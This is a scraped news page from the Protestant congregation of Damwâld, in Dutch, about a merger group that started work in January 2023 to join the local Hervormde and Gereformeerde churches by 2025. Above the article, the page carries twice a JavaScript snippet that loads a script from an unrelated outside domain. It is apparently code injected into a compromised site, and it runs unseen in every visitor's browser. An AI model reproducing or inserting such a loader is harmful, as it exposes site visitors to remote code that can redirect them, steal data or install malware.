;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fusiegroep van start: Werken aan de toekomst van de Protestantse Gemeente Damwâld - PKN Damwâld

Fusiegroep van start: Werken aan de toekomst van de Protestantse Gemeente Damwâld

Gepubliceerd op: dinsdag 7 februari

30 januari 2023 is de nieuwbakken fusiegroep aan de slag gegaan! Al een hele lange tijd waren we aan elkaar aan het wennen. Het komt nu echt aan op het vormen van één gemeente. Dus geen “wij” en “zij” meer. Door de verschillende geledingen binnen beide kerken werd en wordt al geruime tijd gewerkt aan het op elkaar afstemmen en doordat dit ook voorspoedig gaat lijkt de datum van 1 januari 2025 ook goed haalbaar. Uiteraard moet er nog het nodige worden gedaan door bijvoorbeeld de fusiegroep, het moderamen, de kerkrentmeesters, de diaconie, jeugdraad e.d. Praktisch gezien werken veel afdelingen en commissies al samen. Zo is de jeugdraad al sinds mensenheugenis een eenheid en sinds de start van de coronaperikelen vergaderen ook de kerkenraden gezamenlijk. Het gebeurt niet zo vaak, dat je het woord historisch in de mond kunt nemen en dat van toepassing verklaren op een actuele ontwikkeling. Natuurlijk gebruiken we de term wel, wanneer het erom gaat het verleden op te roepen, bijv. tijdens geschiedenisles op school. Op onze eigen Nederlandse geschiedenis valt met het verglijden van de tijd steeds een ander licht, mede onder invloed van het bekend worden van feiten over toenmalige gebeurtenissen. Dus terughoudendheid met het woord historisch is weliswaar geboden, maar we mogen het aandurven nu de fusie van de Hervormde gemeente en Gereformeerde kerk hier in Damwâld in zicht komt. Met de fusie ontstaat de Protestantse Gemeente Damwâld. Dit biedt de kans om samen vorm te geven aan een perspectiefvolle toekomst. Doemdenkend zou je kunnen zeggen dat het samengaan misschien meer noodzaak is dan keuze, maar is het niet zo dat we heel blij mogen zijn dat het er eindelijk van komt. Het momentum is daar. En zeker zijn er nog lastige knopen door te hakken. En ongetwijfeld zullen we onze persoonlijke en eigen-gemeentelijke comfortzone moeten verlaten, want na de fusie volgen vast nog wel lastige afwegingen en moeilijke beslissingen. Maar als we zoeken naar perspectief voor de kerk van morgen – voor zover dat van ons afhangt – dan zullen we nu verstandige rentmeesters moeten zijn in alle opzichten. Vooruit durven dromen en realistisch willen werken aan een nieuwe gemeenschappelijke Protestantse Gemeente Damwâld. Dat vergt van ons allen de (h)erkenning van deze mijlpaal.